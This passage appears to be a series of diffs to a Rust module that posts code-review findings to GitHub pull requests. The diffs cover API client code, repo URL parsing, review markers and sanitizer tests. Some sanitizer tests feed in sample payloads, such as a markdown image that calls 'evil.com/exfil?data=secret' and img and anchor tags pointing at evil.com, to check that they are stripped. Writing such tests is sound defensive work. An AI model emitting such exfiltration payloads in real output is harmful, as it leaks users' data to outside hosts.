+        };
+        let body = render_review_body(
+            "<!-- quorum-review-marker:v1 -->",
+            2,
+            &[f],
+            "0.27.0",
+        );
+        assert!(body.contains("## Quorum Review"));
+        assert!(body.contains("3 findings"));
+        assert!(body.contains("2 inline, 1 in summary"));
+        assert!(body.contains("Findings outside changed lines"));
+    }
+
+    #[test]
+    fn render_review_body_truncates_overflow() {
+        let findings: Vec<Finding> = (0..500)
+            .map(|i| Finding {
+                id: format!("f{i}"),
+                title: format!("Finding {i} with a long title that takes space"),
+                description: "x".repeat(200),
+                severity: Severity::Low,
+                category: Category::Maintainability,
+                source: Source::LocalAst,
+                line_start: i as u32 + 1,
+                line_end: i as u32 + 1,
+                evidence: vec![],
+                calibrator_action: None,
+                similar_precedent: vec![],
+                canonical_pattern: None,
+                suggested_fix: None,
+                based_on_excerpt: None,
+                reasoning: None,
+                llm_confidence: None,
+                confidence: None,
+                cited_lines: None,
+                grounding_status: None,
+                grounding_confidence: None,
+                model_agreement: None,
+                rule_id: None,
+                judge_verdict: None,
+                judge_confidence: None,
+                precision_tier: None,
+                in_diff: None,
+            })
+            .collect();
+        let body = render_review_body(
+            "<!-- quorum-review-marker:v1 -->",
+            0,
+            &findings,
+            "0.27.0",
+        );
+        assert!(body.len() <= 60_000);
+        assert!(body.contains("additional findings omitted"));
+    }
 
     #[test]
     fn sanitize_strips_control_chars() {

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -1,6 +1,7 @@
 use crate::finding::{Finding, Severity, Source};
 use crate::hydration::DiffRanges;
 use regex::Regex;
+use serde::{Deserialize, Serialize};
 use std::sync::LazyLock;
 
 const GITHUB_BODY_LIMIT: usize = 60_000;
@@ -349,6 +350,321 @@ pub fn build_review_marker(run_id: &str, sha: &str, version: &str) -> String {
 
 pub fn body_contains_quorum_marker(body: &str) -> bool {
     body.contains(MARKER_PREFIX)
+}
+
+// --- Task 6: GitHub API client ---
+
+const GITHUB_API_BASE: &str = "https://api.github.com";
+const GITHUB_API_VERSION: &str = "2026-03-10";
+
+#[derive(Debug)]
+pub enum GitHubReportError {
+    Http(reqwest::Error),
+    Api { status: u16, message: String },
+    NoToken,
+    NoRepo(String),
+    InvalidFindings(String),
+}
+
+impl std::fmt::Display for GitHubReportError {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::Http(e) => write!(f, "HTTP error: {}", e),
+            Self::Api { status, message } => {
+                write!(f, "GitHub API error ({}): {}", status, message)
+            }
+            Self::NoToken => write!(f, "No GitHub token"),
+            Self::NoRepo(d) => write!(f, "Cannot determine repo: {}", d),
+            Self::InvalidFindings(d) => write!(f, "Invalid findings: {}", d),
+        }
+    }
+}
+
+impl From<reqwest::Error> for GitHubReportError {
+    fn from(e: reqwest::Error) -> Self {
+        Self::Http(e)
+    }
+}
+
+pub struct PostReviewRequest {
+    pub owner: String,
+    pub repo: String,
+    pub pr_number: u64,
+    pub token: String,
+    pub findings: Vec<Finding>,
+    pub diff_text: String,
+    pub version: String,
+    pub run_id: String,
+    pub commit_sha: String,
+    /// Override API base URL (for testing). Default: https://api.github.com
+    pub api_base_url: Option<String>,
+}
+
+pub struct PostReviewResult {
+    pub review_id: u64,
+    pub inline_count: usize,
+    pub body_count: usize,
+    pub dismissed_previous: Option<u64>,
+}
+
+#[derive(Serialize)]
+struct CreateReviewRequest {
+    commit_id: String,
+    event: String,
+    body: String,
+    comments: Vec<ReviewComment>,
+}
+
+#[derive(Serialize)]
+struct ReviewComment {
+    path: String,
+    body: String,
+    line: u32,
+    side: String,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    start_line: Option<u32>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    start_side: Option<String>,
+}
+
+#[derive(Deserialize)]
+struct ReviewResponse {
+    id: u64,
+}
+
+#[derive(Deserialize)]
+struct ListReviewEntry {
+    id: u64,
+    body: Option<String>,
+}
+
+#[derive(Serialize)]
+struct DismissRequest {
+    message: String,
+    event: String,
+}
+
+fn api_base(req: &PostReviewRequest) -> &str {
+    req.api_base_url.as_deref().unwrap_or(GITHUB_API_BASE)
+}
+
+fn github_client_headers(token: &str) -> reqwest::header::HeaderMap {
+    let mut headers = reqwest::header::HeaderMap::new();
+    headers.insert(
+        reqwest::header::ACCEPT,
+        "application/vnd.github+json".parse().unwrap(),
+    );
+    headers.insert(
+        reqwest::header::AUTHORIZATION,
+        format!("Bearer {}", token).parse().unwrap(),
+    );
+    headers.insert(
+        "X-GitHub-Api-Version",
+        GITHUB_API_VERSION.parse().unwrap(),
+    );
+    headers
+}
+
+async fn dismiss_previous_reviews(
+    client: &reqwest::Client,
+    req: &PostReviewRequest,
+) -> Option<u64> {
+    let base = api_base(req);
+    let url = format!(
+        "{}/repos/{}/{}/pulls/{}/reviews",
+        base, req.owner, req.repo, req.pr_number
+    );
+    let headers = github_client_headers(&req.token);
+    let resp = match client.get(&url).headers(headers.clone()).send().await {
+        Ok(r) => r,
+        Err(e) => {
+            eprintln!("Warning: failed to list reviews for dismiss: {}", e);
+            return None;
+        }
+    };
+    let reviews: Vec<ListReviewEntry> = match resp.json().await {
+        Ok(r) => r,
+        Err(e) => {
+            eprintln!("Warning: failed to parse review list: {}", e);
+            return None;
+        }
+    };
+
+    let mut dismissed_id = None;
+    for review in &reviews {
+        if let Some(body) = &review.body
+            && body_contains_quorum_marker(body)
+        {
+            let dismiss_url = format!("{}/{}/dismissals", url, review.id);
+            let dismiss_body = DismissRequest {
+                message: "Superseded by updated quorum review".into(),
+                event: "DISMISS".into(),
+            };
+            match client
+                .put(&dismiss_url)
+                .headers(headers.clone())
+                .json(&dismiss_body)
+                .send()
+                .await
+            {
+                Ok(r) if r.status().is_success() => {
+                    dismissed_id = Some(review.id);
+                }
+                Ok(r) => {
+                    eprintln!(
+                        "Warning: dismiss review {} returned {}: best-effort, continuing",
+                        review.id,
+                        r.status()
+                    );
+                }
+                Err(e) => {
+                    eprintln!("Warning: dismiss review {} failed: {}", review.id, e);
+                }
+            }
+        }
+    }
+    dismissed_id
+}
+
+pub async fn fetch_pr_diff(
+    client: &reqwest::Client,
+    owner: &str,
+    repo: &str,
+    pr_number: u64,
+    token: &str,
+    api_base_url: Option<&str>,
+) -> Result<String, GitHubReportError> {
+    let base = api_base_url.unwrap_or(GITHUB_API_BASE);
+    let url = format!("{}/repos/{}/{}/pulls/{}", base, owner, repo, pr_number);
+    let mut headers = github_client_headers(token);
+    headers.insert(
+        reqwest::header::ACCEPT,
+        "application/vnd.github.diff".parse().unwrap(),
+    );
+    let resp = client.get(&url).headers(headers).send().await?;
+    if !resp.status().is_success() {
+        return Err(GitHubReportError::Api {
+            status: resp.status().as_u16(),
+            message: resp.text().await.unwrap_or_default(),
+        });
+    }
+    Ok(resp.text().await?)
+}
+
+pub async fn fetch_pr_head_sha(
+    client: &reqwest::Client,
+    owner: &str,
+    repo: &str,
+    pr_number: u64,
+    token: &str,
+    api_base_url: Option<&str>,
+) -> Result<String, GitHubReportError> {
+    let base = api_base_url.unwrap_or(GITHUB_API_BASE);
+    let url = format!("{}/repos/{}/{}/pulls/{}", base, owner, repo, pr_number);
+    let headers = github_client_headers(token);
+    let resp = client.get(&url).headers(headers).send().await?;
+    if !resp.status().is_success() {
+        return Err(GitHubReportError::Api {
+            status: resp.status().as_u16(),
+            message: resp.text().await.unwrap_or_default(),
+        });
+    }
+    let body: serde_json::Value = resp.json().await?;
+    body["head"]["sha"]
+        .as_str()
+        .map(|s| s.to_string())
+        .ok_or_else(|| GitHubReportError::Api {
+            status: 200,
+            message: "PR response missing head.sha".into(),
+        })
+}
+
+pub async fn post_review(
+    client: &reqwest::Client,
+    req: &PostReviewRequest,
+) -> Result<PostReviewResult, GitHubReportError> {
+    let diff_ranges = crate::hydration::parse_unified_diff(&req.diff_text);
+    let marker = build_review_marker(&req.run_id, &req.commit_sha, &req.version);
+
+    // Dismiss previous reviews (best-effort)
+    let dismissed_previous = dismiss_previous_reviews(client, req).await;
+
+    // Classify findings
+    let mut inline_comments = Vec::new();
+    let mut body_findings = Vec::new();
+
+    for finding in &req.findings {
+        // Use first evidence entry as file path (populated by the review pipeline)
+        let file_path = finding.evidence.first().map(|s| s.as_str()).unwrap_or("");
+        let target = classify_posting_target(finding, file_path, &diff_ranges);
+        match target {
+            PostingTarget::Inline => {
+                let body = render_inline_comment(finding, &req.version);
+                inline_comments.push(ReviewComment {
+                    path: file_path.to_string(),
+                    body,
+                    line: finding.anchor_line(),
+                    side: "RIGHT".into(),
+                    start_line: if finding.line_start != finding.line_end {
+                        Some(finding.line_start)
+                    } else {
+                        None
+                    },
+                    start_side: if finding.line_start != finding.line_end {
+                        Some("RIGHT".into())
+                    } else {
+                        None
+                    },
+                });
+            }
+            PostingTarget::Body => {
+                body_findings.push(finding.clone());
+            }
+        }
+    }
+
+    let review_body = render_review_body(
+        &marker,
+        inline_comments.len(),
+        &body_findings,
+        &req.version,
+    );
+
+    let create_req = CreateReviewRequest {
+        commit_id: req.commit_sha.clone(),
+        event: "COMMENT".into(),
+        body: review_body,
+        comments: inline_comments,
+    };
+
+    let base = api_base(req);
+    let url = format!(
+        "{}/repos/{}/{}/pulls/{}/reviews",
+        base, req.owner, req.repo, req.pr_number
+    );
+    let headers = github_client_headers(&req.token);
+    let resp = client
+        .post(&url)
+        .headers(headers)
+        .json(&create_req)
+        .send()
+        .await?;
+
+    if !resp.status().is_success() {
+        return Err(GitHubReportError::Api {
+            status: resp.status().as_u16(),
+            message: resp.text().await.unwrap_or_default(),
+        });
+    }
+
+    let review: ReviewResponse = resp.json().await?;
+
+    Ok(PostReviewResult {
+        review_id: review.id,
+        inline_count: create_req.comments.len(),
+        body_count: body_findings.len(),
+        dismissed_previous,
+    })
 }
 
 #[cfg(test)]

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -237,6 +237,120 @@ pub fn render_review_body(
     out
 }
 
+// --- Task 4: Repo URL parsing and GitHub context resolution ---
+
+pub fn parse_github_repo_url(url: &str) -> Option<(String, String)> {
+    // Direct owner/repo format (e.g. from GITHUB_REPOSITORY)
+    if !url.contains("://") && !url.contains('@') {
+        let parts: Vec<&str> = url.split('/').collect();
+        if parts.len() == 2 && !parts[0].is_empty() && !parts[1].is_empty() {
+            return Some((parts[0].to_string(), parts[1].to_string()));
+        }
+    }
+
+    // SSH: git@host:owner/repo.git
+    if let Some(colon_part) = url.strip_prefix("git@") &&
+        let Some(path) = colon_part.split(':').nth(1)
+    {
+        return parse_owner_repo_from_path(path);
+    }
+
+    // HTTPS: https://host/owner/repo.git
+    if url.starts_with("https://") || url.starts_with("http://") {
+        let path = url
+            .split("://")
+            .nth(1)?
+            .split('/')
+            .skip(1) // skip hostname
+            .collect::<Vec<_>>()
+            .join("/");
+        return parse_owner_repo_from_path(&path);
+    }
+
+    None
+}
+
+fn parse_owner_repo_from_path(path: &str) -> Option<(String, String)> {
+    let clean = path.strip_suffix(".git").unwrap_or(path);
+    let parts: Vec<&str> = clean.split('/').collect();
+    if parts.len() >= 2 && !parts[0].is_empty() && !parts[1].is_empty() {
+        Some((parts[0].to_string(), parts[1].to_string()))
+    } else {
+        None
+    }
+}
+
+#[derive(Debug, Clone)]
+pub struct GitHubContext {
+    pub owner: String,
+    pub repo: String,
+    pub token: String,
+}
+
+#[derive(Debug)]
+pub enum GitHubContextError {
+    NoToken,
+    NoRepo(String),
+}
+
+impl std::fmt::Display for GitHubContextError {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::NoToken => write!(
+                f,
+                "No GitHub token found. Set GITHUB_TOKEN or use --github-token"
+            ),
+            Self::NoRepo(detail) => write!(f, "Could not determine repository: {}", detail),
+        }
+    }
+}
+
+pub fn resolve_github_context(
+    token_flag: Option<&str>,
+    repo_flag: Option<&str>,
+) -> Result<GitHubContext, GitHubContextError> {
+    let token = token_flag
+        .map(|s| s.to_string())
+        .or_else(|| std::env::var("GITHUB_TOKEN").ok())
+        .filter(|s| !s.is_empty())
+        .ok_or(GitHubContextError::NoToken)?;
+
+    let (owner, repo) = if let Some(r) = repo_flag {
+        parse_github_repo_url(r)
+            .ok_or_else(|| GitHubContextError::NoRepo(format!("invalid format: {}", r)))?
+    } else if let Ok(gh_repo) = std::env::var("GITHUB_REPOSITORY") {
+        parse_github_repo_url(&gh_repo).ok_or_else(|| {
+            GitHubContextError::NoRepo(format!("GITHUB_REPOSITORY={}", gh_repo))
+        })?
+    } else {
+        // Try git remote
+        let output = std::process::Command::new("git")
+            .args(["remote", "get-url", "origin"])
+            .output()
+            .map_err(|e| GitHubContextError::NoRepo(format!("git remote failed: {}", e)))?;
+        let url = String::from_utf8_lossy(&output.stdout).trim().to_string();
+        parse_github_repo_url(&url)
+            .ok_or_else(|| GitHubContextError::NoRepo(format!("cannot parse remote: {}", url)))?
+    };
+
+    Ok(GitHubContext { owner, repo, token })
+}
+
+// --- Task 5: Marker protocol and dismiss logic ---
+
+const MARKER_PREFIX: &str = "quorum-review-marker:v1";
+
+pub fn build_review_marker(run_id: &str, sha: &str, version: &str) -> String {
+    format!(
+        "<!-- {} run_id={} sha={} version={} -->",
+        MARKER_PREFIX, run_id, sha, version
+    )
+}
+
+pub fn body_contains_quorum_marker(body: &str) -> bool {
+    body.contains(MARKER_PREFIX)
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -551,5 +665,79 @@ mod tests {
         let f = make_finding("test", 1, true);
         let target = classify_posting_target(&f, "src/auth.rs", &ranges);
         assert_eq!(target, PostingTarget::Body);
+    }
+
+    // --- Task 4 tests: URL parsing ---
+
+    #[test]
+    fn parse_repo_https() {
+        let (owner, repo) =
+            parse_github_repo_url("https://github.com/jsnyder/quorum.git").unwrap();
+        assert_eq!(owner, "jsnyder");
+        assert_eq!(repo, "quorum");
+    }
+
+    #[test]
+    fn parse_repo_https_no_dot_git() {
+        let (owner, repo) = parse_github_repo_url("https://github.com/jsnyder/quorum").unwrap();
+        assert_eq!(owner, "jsnyder");
+        assert_eq!(repo, "quorum");
+    }
+
+    #[test]
+    fn parse_repo_ssh() {
+        let (owner, repo) =
+            parse_github_repo_url("git@github.com:jsnyder/quorum.git").unwrap();
+        assert_eq!(owner, "jsnyder");
+        assert_eq!(repo, "quorum");
+    }
+
+    #[test]
+    fn parse_repo_slash_format() {
+        let (owner, repo) = parse_github_repo_url("jsnyder/quorum").unwrap();
+        assert_eq!(owner, "jsnyder");
+        assert_eq!(repo, "quorum");
+    }
+
+    #[test]
+    fn parse_repo_invalid() {
+        assert!(parse_github_repo_url("not-a-repo").is_none());
+    }
+
+    #[test]
+    fn parse_github_enterprise() {
+        let (owner, repo) =
+            parse_github_repo_url("https://github.example.com/org/repo.git").unwrap();
+        assert_eq!(owner, "org");
+        assert_eq!(repo, "repo");
+    }
+
+    // --- Task 5 tests: marker protocol ---
+
+    #[test]
+    fn build_marker() {
+        let m = build_review_marker("01JTEST", "abc1234", "0.27.0");
+        assert!(m.starts_with("<!-- quorum-review-marker:v1"));
+        assert!(m.contains("run_id=01JTEST"));
+        assert!(m.contains("sha=abc1234"));
+        assert!(m.contains("version=0.27.0"));
+        assert!(m.ends_with("-->"));
+    }
+
+    #[test]
+    fn find_marker_in_body() {
+        let body = "Some text\n<!-- quorum-review-marker:v1 run_id=X sha=Y version=0.27.0 -->\nMore text";
+        assert!(body_contains_quorum_marker(body));
+    }
+
+    #[test]
+    fn no_marker_in_body() {
+        assert!(!body_contains_quorum_marker("Just a regular review body"));
+    }
+
+    #[test]
+    fn find_marker_with_extra_whitespace() {
+        let body = "<!-- quorum-review-marker:v1  run_id=X  sha=Y  version=0.27.0 -->";
+        assert!(body_contains_quorum_marker(body));
     }
 }

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -19,14 +19,12 @@ static RE_ISSUE_REF: LazyLock<Regex> =
 static RE_MD_IMAGE: LazyLock<Regex> =
     LazyLock::new(|| Regex::new(r"!\[[^\]]*\]\([^)]*\)").unwrap());
 
-static RE_HTML_IMG: LazyLock<Regex> =
-    LazyLock::new(|| Regex::new(r"(?i)<img[^>]*>").unwrap());
+static RE_HTML_IMG: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"(?i)<img[^>]*>").unwrap());
 
 static RE_HTML_ANCHOR: LazyLock<Regex> =
     LazyLock::new(|| Regex::new(r"(?is)<a[^>]*>(.*?)</a>").unwrap());
 
-static RE_BACKTICK_RUN: LazyLock<Regex> =
-    LazyLock::new(|| Regex::new(r"(`{3,})").unwrap());
+static RE_BACKTICK_RUN: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"(`{3,})").unwrap());
 
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
 pub enum PostingTarget {
@@ -187,7 +185,11 @@ fn format_summary_counts(inline_count: usize, body_findings: &[Finding]) -> Stri
     let location = if body_findings.is_empty() {
         String::new()
     } else {
-        format!(" | {} inline, {} in summary", inline_count, body_findings.len())
+        format!(
+            " | {} inline, {} in summary",
+            inline_count,
+            body_findings.len()
+        )
     };
 
     format!("{} findings{}{}", total, sev_summary, location)
@@ -250,8 +252,8 @@ pub fn parse_github_repo_url(url: &str) -> Option<(String, String)> {
     }
 
     // SSH: git@host:owner/repo.git
-    if let Some(colon_part) = url.strip_prefix("git@") &&
-        let Some(path) = colon_part.split(':').nth(1)
+    if let Some(colon_part) = url.strip_prefix("git@")
+        && let Some(path) = colon_part.split(':').nth(1)
     {
         return parse_owner_repo_from_path(path);
     }
@@ -320,9 +322,8 @@ pub fn resolve_github_context(
         parse_github_repo_url(r)
             .ok_or_else(|| GitHubContextError::NoRepo(format!("invalid format: {}", r)))?
     } else if let Ok(gh_repo) = std::env::var("GITHUB_REPOSITORY") {
-        parse_github_repo_url(&gh_repo).ok_or_else(|| {
-            GitHubContextError::NoRepo(format!("GITHUB_REPOSITORY={}", gh_repo))
-        })?
+        parse_github_repo_url(&gh_repo)
+            .ok_or_else(|| GitHubContextError::NoRepo(format!("GITHUB_REPOSITORY={}", gh_repo)))?
     } else {
         // Try git remote
         let output = std::process::Command::new("git")
@@ -458,10 +459,7 @@ fn github_client_headers(token: &str) -> reqwest::header::HeaderMap {
         reqwest::header::AUTHORIZATION,
         format!("Bearer {}", token).parse().unwrap(),
     );
-    headers.insert(
-        "X-GitHub-Api-Version",
-        GITHUB_API_VERSION.parse().unwrap(),
-    );
+    headers.insert("X-GitHub-Api-Version", GITHUB_API_VERSION.parse().unwrap());
     headers
 }
 
@@ -623,12 +621,8 @@ pub async fn post_review(
         }
     }
 
-    let review_body = render_review_body(
-        &marker,
-        inline_comments.len(),
-        &body_findings,
-        &req.version,
-    );
+    let review_body =
+        render_review_body(&marker, inline_comments.len(), &body_findings, &req.version);
 
     let create_req = CreateReviewRequest {
         commit_id: req.commit_sha.clone(),
@@ -782,12 +776,7 @@ mod tests {
             precision_tier: None,
             in_diff: None,
         };
-        let body = render_review_body(
-            "<!-- quorum-review-marker:v1 -->",
-            2,
-            &[f],
-            "0.27.0",
-        );
+        let body = render_review_body("<!-- quorum-review-marker:v1 -->", 2, &[f], "0.27.0");
         assert!(body.contains("## Quorum Review"));
         assert!(body.contains("3 findings"));
         assert!(body.contains("2 inline, 1 in summary"));
@@ -826,12 +815,7 @@ mod tests {
                 in_diff: None,
             })
             .collect();
-        let body = render_review_body(
-            "<!-- quorum-review-marker:v1 -->",
-            0,
-            &findings,
-            "0.27.0",
-        );
+        let body = render_review_body("<!-- quorum-review-marker:v1 -->", 0, &findings, "0.27.0");
         assert!(body.len() <= 60_000);
         assert!(body.contains("additional findings omitted"));
     }
@@ -987,8 +971,7 @@ mod tests {
 
     #[test]
     fn parse_repo_https() {
-        let (owner, repo) =
-            parse_github_repo_url("https://github.com/jsnyder/quorum.git").unwrap();
+        let (owner, repo) = parse_github_repo_url("https://github.com/jsnyder/quorum.git").unwrap();
         assert_eq!(owner, "jsnyder");
         assert_eq!(repo, "quorum");
     }
@@ -1002,8 +985,7 @@ mod tests {
 
     #[test]
     fn parse_repo_ssh() {
-        let (owner, repo) =
-            parse_github_repo_url("git@github.com:jsnyder/quorum.git").unwrap();
+        let (owner, repo) = parse_github_repo_url("git@github.com:jsnyder/quorum.git").unwrap();
         assert_eq!(owner, "jsnyder");
         assert_eq!(repo, "quorum");
     }
@@ -1042,7 +1024,8 @@ mod tests {
 
     #[test]
     fn find_marker_in_body() {
-        let body = "Some text\n<!-- quorum-review-marker:v1 run_id=X sha=Y version=0.27.0 -->\nMore text";
+        let body =
+            "Some text\n<!-- quorum-review-marker:v1 run_id=X sha=Y version=0.27.0 -->\nMore text";
         assert!(body_contains_quorum_marker(body));
     }
 
@@ -1083,14 +1066,16 @@ mod integration_tests {
                     let body = "[]";
                     let resp = format!(
                         "HTTP/1.1 200 OK\r\nContent-Length: {}\r\nContent-Type: application/json\r\n\r\n{}",
-                        body.len(), body
+                        body.len(),
+                        body
                     );
                     stream.write_all(resp.as_bytes()).unwrap();
                 } else {
                     let body = r#"{"id": 42}"#;
                     let resp = format!(
                         "HTTP/1.1 200 OK\r\nContent-Length: {}\r\nContent-Type: application/json\r\n\r\n{}",
-                        body.len(), body
+                        body.len(),
+                        body
                     );
                     stream.write_all(resp.as_bytes()).unwrap();
                 }

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -330,6 +330,11 @@ pub fn resolve_github_context(
             .args(["remote", "get-url", "origin"])
             .output()
             .map_err(|e| GitHubContextError::NoRepo(format!("git remote failed: {}", e)))?;
+        if !output.status.success() {
+            return Err(GitHubContextError::NoRepo(
+                "git remote get-url origin exited with non-zero status".into(),
+            ));
+        }
         let url = String::from_utf8_lossy(&output.stdout).trim().to_string();
         parse_github_repo_url(&url)
             .ok_or_else(|| GitHubContextError::NoRepo(format!("cannot parse remote: {}", url)))?
@@ -480,6 +485,13 @@ async fn dismiss_previous_reviews(
             return None;
         }
     };
+    if !resp.status().is_success() {
+        eprintln!(
+            "Warning: list reviews returned {}: skipping dismiss",
+            resp.status()
+        );
+        return None;
+    }
     let reviews: Vec<ListReviewEntry> = match resp.json().await {
         Ok(r) => r,
         Err(e) => {

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -1,0 +1,153 @@
+use regex::Regex;
+use std::sync::LazyLock;
+
+const GITHUB_BODY_LIMIT: usize = 60_000;
+
+// Matches @mention not preceded by a word char (e.g. not user@example.com).
+// Uses a capturing group with an optional non-word boundary prefix character.
+static RE_MENTION: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(^|[^a-zA-Z0-9_.])@([a-zA-Z0-9][-a-zA-Z0-9]*)").unwrap());
+
+// Matches #123 not preceded by a word char or dot (e.g. not docs.md#section).
+static RE_ISSUE_REF: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(^|[^a-zA-Z0-9_.])#(\d+)").unwrap());
+
+static RE_MD_IMAGE: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"!\[[^\]]*\]\([^)]*\)").unwrap());
+
+static RE_HTML_IMG: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(?i)<img[^>]*>").unwrap());
+
+static RE_HTML_ANCHOR: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(?is)<a[^>]*>(.*?)</a>").unwrap());
+
+static RE_BACKTICK_RUN: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(`{3,})").unwrap());
+
+pub fn sanitize_for_github(s: &str) -> String {
+    // 1. Strip control characters (keep \n, \t)
+    let mut out: String = s
+        .chars()
+        .filter(|c| !c.is_control() || *c == '\n' || *c == '\t')
+        .collect();
+
+    // 2. Break backtick runs of 3+ by inserting a zero-width space after the second backtick.
+    // This prevents them from being interpreted as fenced code block delimiters.
+    out = RE_BACKTICK_RUN
+        .replace_all(&out, |caps: &regex::Captures| {
+            let ticks = &caps[1];
+            // Insert a zero-width space (U+200B) after the 2nd backtick to break the fence.
+            format!("``\u{200B}{}", &ticks[2..])
+        })
+        .into_owned();
+
+    // 3. Strip HTML anchors (keep inner text)
+    out = RE_HTML_ANCHOR.replace_all(&out, "$1").into_owned();
+
+    // 4. Strip image tags
+    out = RE_MD_IMAGE.replace_all(&out, "").into_owned();
+    out = RE_HTML_IMG.replace_all(&out, "").into_owned();
+
+    // 5. Neutralize @mentions (but not emails)
+    // Group 1 is the non-word prefix char (or empty at start), group 2 is the username.
+    out = RE_MENTION.replace_all(&out, "${1}`@$2`").into_owned();
+
+    // 6. Neutralize #refs (but not URL fragments)
+    // Group 1 is the non-word prefix char (or empty at start), group 2 is the number.
+    out = RE_ISSUE_REF.replace_all(&out, "${1}`#$2`").into_owned();
+
+    // 7. Truncate
+    if out.len() > GITHUB_BODY_LIMIT {
+        out.truncate(GITHUB_BODY_LIMIT);
+        while !out.is_char_boundary(out.len()) {
+            out.pop();
+        }
+    }
+
+    out
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn sanitize_strips_control_chars() {
+        assert_eq!(sanitize_for_github("hello\x00world\x07"), "helloworld");
+    }
+
+    #[test]
+    fn sanitize_preserves_newlines_and_tabs() {
+        assert_eq!(sanitize_for_github("line1\nline2\tok"), "line1\nline2\tok");
+    }
+
+    #[test]
+    fn sanitize_escapes_triple_backticks() {
+        let input = "break ```out``` of fence";
+        let result = sanitize_for_github(input);
+        assert!(!result.contains("```"));
+    }
+
+    #[test]
+    fn sanitize_neutralizes_at_mentions() {
+        assert_eq!(
+            sanitize_for_github("ping @admin about this"),
+            "ping `@admin` about this"
+        );
+    }
+
+    #[test]
+    fn sanitize_neutralizes_issue_refs() {
+        assert_eq!(
+            sanitize_for_github("see #123 for details"),
+            "see `#123` for details"
+        );
+    }
+
+    #[test]
+    fn sanitize_strips_markdown_images() {
+        assert_eq!(
+            sanitize_for_github("text ![alt](http://evil.com/exfil?data=secret) more"),
+            "text  more"
+        );
+    }
+
+    #[test]
+    fn sanitize_strips_html_img_tags() {
+        assert_eq!(
+            sanitize_for_github("before <img src=\"http://evil.com\"> after"),
+            "before  after"
+        );
+    }
+
+    #[test]
+    fn sanitize_strips_html_anchor_tags() {
+        assert_eq!(
+            sanitize_for_github("click <a href=\"http://evil.com\">here</a> now"),
+            "click here now"
+        );
+    }
+
+    #[test]
+    fn sanitize_truncates_at_limit() {
+        let long = "x".repeat(65_000);
+        let result = sanitize_for_github(&long);
+        assert!(result.len() <= 60_000);
+    }
+
+    #[test]
+    fn sanitize_no_false_positive_on_email() {
+        assert_eq!(
+            sanitize_for_github("email user@example.com here"),
+            "email user@example.com here"
+        );
+    }
+
+    #[test]
+    fn sanitize_no_false_positive_on_hash_in_url() {
+        assert_eq!(
+            sanitize_for_github("see docs.md#section"),
+            "see docs.md#section"
+        );
+    }
+}

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -1,4 +1,5 @@
 use crate::finding::{Finding, Severity, Source};
+use crate::hydration::DiffRanges;
 use regex::Regex;
 use std::sync::LazyLock;
 
@@ -25,6 +26,37 @@ static RE_HTML_ANCHOR: LazyLock<Regex> =
 
 static RE_BACKTICK_RUN: LazyLock<Regex> =
     LazyLock::new(|| Regex::new(r"(`{3,})").unwrap());
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum PostingTarget {
+    Inline,
+    Body,
+}
+
+pub fn classify_posting_target(
+    finding: &Finding,
+    file_path: &str,
+    diff_ranges: &DiffRanges,
+) -> PostingTarget {
+    if finding.in_diff != Some(true) {
+        return PostingTarget::Body;
+    }
+
+    let anchor = finding.anchor_line();
+
+    for (path, ranges) in diff_ranges {
+        if path == file_path {
+            for &(start, end) in ranges {
+                if anchor >= start && anchor <= end {
+                    return PostingTarget::Inline;
+                }
+            }
+            return PostingTarget::Body;
+        }
+    }
+
+    PostingTarget::Body
+}
 
 pub fn sanitize_for_github(s: &str) -> String {
     // 1. Strip control characters (keep \n, \t)
@@ -452,5 +484,72 @@ mod tests {
             sanitize_for_github("see docs.md#section"),
             "see docs.md#section"
         );
+    }
+
+    fn make_finding(id: &str, line: u32, in_diff: bool) -> Finding {
+        Finding {
+            id: id.into(),
+            title: "Test finding".into(),
+            description: "Desc".into(),
+            severity: Severity::Medium,
+            category: Category::Security,
+            source: Source::LocalAst,
+            line_start: line,
+            line_end: line,
+            evidence: vec![],
+            calibrator_action: None,
+            similar_precedent: vec![],
+            canonical_pattern: None,
+            suggested_fix: None,
+            based_on_excerpt: None,
+            reasoning: None,
+            llm_confidence: None,
+            confidence: None,
+            cited_lines: None,
+            grounding_status: None,
+            grounding_confidence: None,
+            model_agreement: None,
+            rule_id: None,
+            judge_verdict: None,
+            judge_confidence: None,
+            precision_tier: None,
+            in_diff: Some(in_diff),
+        }
+    }
+
+    #[test]
+    fn classify_finding_in_diff_and_commentable() {
+        let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,5 +40,7 @@\n context\n+added line\n+another\n context\n";
+        let ranges = crate::hydration::parse_unified_diff(diff);
+        let f = make_finding("test", 41, true);
+        let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+        assert_eq!(target, PostingTarget::Inline);
+    }
+
+    #[test]
+    fn classify_finding_in_diff_but_not_commentable() {
+        let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,3 +40,5 @@\n context\n+added\n+added\n context\n";
+        let ranges = crate::hydration::parse_unified_diff(diff);
+        let f = make_finding("test", 100, true);
+        let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+        assert_eq!(target, PostingTarget::Body);
+    }
+
+    #[test]
+    fn classify_finding_not_in_diff() {
+        let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,3 +40,5 @@\n context\n+added\n+added\n context\n";
